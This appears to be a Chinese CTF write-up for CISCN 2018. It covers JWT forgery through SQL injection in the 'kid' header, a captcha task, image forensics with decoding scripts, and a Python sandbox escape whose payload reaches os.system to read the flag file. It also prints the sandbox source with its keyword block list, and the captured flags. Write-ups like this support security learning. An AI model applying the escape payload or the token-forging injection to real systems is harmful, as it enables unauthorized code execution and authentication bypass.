全部赛题：https://github.com/findneo/ctfgodown/tree/master/20180430-ciscn

WEB

easyweb

http://114.116.26.217/

学习了一点 json web token ，但是没想到是个脑洞。（应该只是非预期解）

账户admin，空密码登陆。

ciscn{2a36b5f78a1d6a107212d82ee133c421}

有师傅在群里说HMAC的密钥放在数据库里，而kid是个注入点，可以通过联合查询控制查询结果，然后伪造签名。

从开始做到赛后试着复现都一直纠结alg 是sha256的问题，以为密钥是用来加盐，然后就自己胡乱加盐，陷入困境。后来仔细了解了一下，HMAC就算是一个比较复杂的加盐算法吧，自己加没啥意思，而且jwt也不支持纯粹sha256。

事实证明把sha256改成HS256就好了。这里有两种可能，一是后端写死算法为HS256，然后header里面写成了sha256，二是算法根据alg 的值确定，我们传入HS256所以按照HS256来计算。

经过测试发现后端甚至根本不在乎有没alg ，，，，所以说做题思路还是要灵活一些。

kid的值随意传，奇怪一点就行，只要让它查询不出结果，那么我们联合查询的值就会作为最后的密钥。

参考：

MISC

验证码

本题目为验证码破解，选手需在指定时间完成对验证码的破解，成功后获取Flag。请使用队伍token进行登陆。参考数据：https://share.weiyun.com/6e055fc3402e86c7cbb5384f1a6b41b8
https://game.captcha.qq.com/hslj/html/hslj/

题目有点问题，手动玩了一会儿。

ciscn{12qiftb1qj12mbzm1xmjd2iix2ibqz7i}

后来换成输验证码得flag了。

picture

请从图中找出密码。

binwalk -e 分离得到 97E4 和 97E4.zlib 两个文件，后者是前者的 zlib 压缩文件。

1
2
3

import zlib
print zlib.decompress(open('97E4.zlib','rb').read())==open('97E4','rb').read() 
# got True

文件97E4 内容的base64解码后稍做处理是一个加密的压缩包。

import base64
t=open('97E4','rb').read()
m=base64.b64decode(t).encode("hex")
n=''
for i in range(len(m)/4):
	n+=m[i*4+2:i*4+4]+m[i*4:i*4+2]
print n
# 504b040300140001000030904c97542e7f25005a0000004e0000000400006f6365647ab0d6a3f3bbc8060511ce0c8b62793d8d39caf2b644325509c991cb202dc981e60ea354ca8de79f3bc187f6719f4738adf24fa3ca2d9d7b8adda175d833d1c0264225c62d86784977cf5973989ea77ddbbf31060aef47124fca4b500201003f00140001000030904c97542e7f25005a0000004e00000004002400000000000000200000000000006f636564000a002000000000000100189800e452da8501d3bcf6ace5da8701d3bcf6ace5da8701d34b500605000000000001000100560000007c000000dc505b74796f68206e2e325d370a0d3e3e203e7da87da87da80a0d0a0d7254636162656361206b6d28736f207465726563746e63206c61206c616c74733a290a0d20206946656c2220703c737965686c6c3023223e202c696c656e3120202c6e693c206f6d7564656c0d3e200a2020a820a87da87d0d7d5a0a7265446f766973696f69456e7272726f203a7da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da83c20202d617073736f7764723b200d293e0a3e3e0020

大致内容如下：

对比得到密码： integer division or modulo by zero

得到一串编码后字符：

解码得到 CISCN{C16E6F6E065DA0306E318D095C68BDC0}

run

参考链接：

1
2
3

payload:
print ().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__('func_global'+'s')['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ca'+'t'+' /home/ctf/5c72a1d444cf3121a5d25f2db4147ebb')
# ciscn{db87226edc7f9aff82a6b524053eef9e}

顺便dump下来几个文件

cpython.py

from ctypes import pythonapi,POINTER,py_object

_get_dict = pythonapi._PyObject_GetDictPtr
_get_dict.restype = POINTER(py_object)
_get_dict.argtypes = [py_object]

del pythonapi,POINTER,py_object

def get_dict(ob):
    return _get_dict(ob).contents.value

sandbox.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date    : 2018-04-09 23:30:58
# @Author  : Xu (you@example.org)
# @Link    : https://xuccc.github.io/
# @Version : $Id$

from sys import modules
from cpython import get_dict
from types import FunctionType

main  = modules['__main__'].__dict__
origin_builtins = main['__builtins__'].__dict__

def delete_type():
    type_dict = get_dict(type)
    del type_dict['__bases__']
    del type_dict['__subclasses__']

def delete_func_code():
    func_dict = get_dict(FunctionType)
    del func_dict['func_code']

def safe_import(__import__,whiteList):
    def importer(name,globals={},locals={},fromlist=[],level=-1):
        if name in whiteList:
            return __import__(name,globals,locals,fromlist,level)
        else:
            print "HAHA,[%s]  has been banned~" % name
    return importer

class ReadOnly(dict):
    """docstring for ReadOnlu"""
    def __delitem__(self,keys):
        raise ValueError(":(")
    def pop(self,key,default=None):
        raise ValueError(":(")
    def popitem(self):
        raise ValueError(":(")
    def setdefault(self,key,value):
        raise ValueError(":(")
    def __setitem__(self,key,value):
        raise ValueError(":(")
    def __setattr__(self, name, value):
        raise ValueError(":(")
    def update(self,dict,**kwargs):
        raise ValueError(":(")

def builtins_clear():
    whiteList = "raw_input  SyntaxError   ValueError  NameError  Exception __import__".split(" ")
    for mod in __builtins__.__dict__.keys():
        if mod not in whiteList:
            del __builtins__.__dict__[mod]

def input_filter(string):
    ban = "exec eval pickle os subprocess input sys ls cat".split(" ")
    for i in ban:
        if i in string.lower():
            print "{} has been banned!".format(i)
            return ""
    return string

# delete_type();
del delete_type
delete_func_code();del delete_func_code
builtins_clear();del builtins_clear


whiteMod = []
origin_builtins['__import__'] = safe_import(__import__,whiteMod)
safe_builtins = ReadOnly(origin_builtins);del ReadOnly
main['__builtins__'] = safe_builtins;del safe_builtins

del get_dict,modules,origin_builtins,safe_import,whiteMod,main,FunctionType
del __builtins__, __doc__, __file__, __name__, __package__

print """
  ____
 |  _ \ _   _ _ __
 | |_) | | | | '_ \
 |  _ <| |_| | | | |
 |_| \_\\__,_|_| |_|


Escape from the dark house built with python :)

Try to getshell then find the flag!

"""

while 1:
    inp = raw_input('>>>')
    cmd = input_filter(inp)
    try:
        exec cmd
    except NameError, e:
        print "wow something lose!We can\'t find it !  D:"
    except SyntaxError,e:
        print "Noob! Synax Wrong! :("
    except Exception,e:
        print "unknow error,try again  :>"

/home/ctf/bin

题目备份

https://github.com/findneo/ctfgodown/tree/master/20180430-ciscn

WEB#

easyweb#

MISC#

验证码#

picture#

run#

题目备份#

WEB

easyweb

MISC

验证码

picture

run

题目备份